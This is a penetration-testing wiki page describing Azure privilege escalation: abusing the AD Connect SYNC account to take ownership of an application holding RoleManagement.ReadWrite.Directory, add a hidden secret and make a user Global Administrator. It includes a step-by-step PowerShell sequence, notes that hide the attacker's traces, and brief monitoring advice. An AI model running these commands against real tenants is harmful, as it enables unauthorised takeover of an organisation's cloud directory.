Applications Rights Abuse

Table of contents

  1. Vulnerability
  2. Prerequisites
  3. Exploit
  4. Recommendations


Once you extracted synchronization credentials from AD Connect server, you can know leverage misconfigured Azure applications with excessive rights to escalate your privileges to Global Administrator.

As explained in this article, SYNC account is by default member of Directory Synchronization Accounts role, which gives rights to update owners of any application. Note that being owner of an application, you can add secrets to it, allowing you to authenticate with on Azure.

If you find an application with RoleManagement.ReadWrite.Directory permission, allowing the application to modify user roles, you could:

  1. Put a principal you own as owner of this application.
  2. Use this principal to add a new secret to the application.
  3. Use this secret to impersonate the application.
  4. Leverage RoleManagement.ReadWrite.Directory permission to add any user in Global Administrator group.



To perform steps explained above, use AbuseAzureAPIPermissions.

Secrets you add to an application using Microsoft API do not appear in Azure Web GUI. *Don’t forget to clean them.

Import-Module .\AbuseAzureAPIPermissions.ps1
Install-Module Az

# Login on Azure as SYNC.

# Search for applications with RoleManagement.ReadWrite.Directory permission.
Find-AAAInterestingDirectoryRoleAssignment -ServicePrinciple

# Add a secret to such an application.
New-AAAAppPassword -ServicePrinciple -AppId "$AppId"

# Authenticate as the application using the new secret.
Get-AAATokenFromAzLogin -User "$AppId" -Password "$SecretValue" -TenantId "$TenantId" -ServicePrincipal

# Add a user in Global Administrator group.
$GlobalAdminTemplateId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $UserToPrivEsc

# To clean your mess.
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTemplateId -TargetObjectId $UserToPrivEsc
Remove-AAAAppPassword -ServicePrinciple -AppId "$AppId" -KeyId "$KeyId"


  • Monitor SYNC account usage, detecting request from somewhere else than the AD Connect server.
  • Monitor Global Administrator group to detect modifications.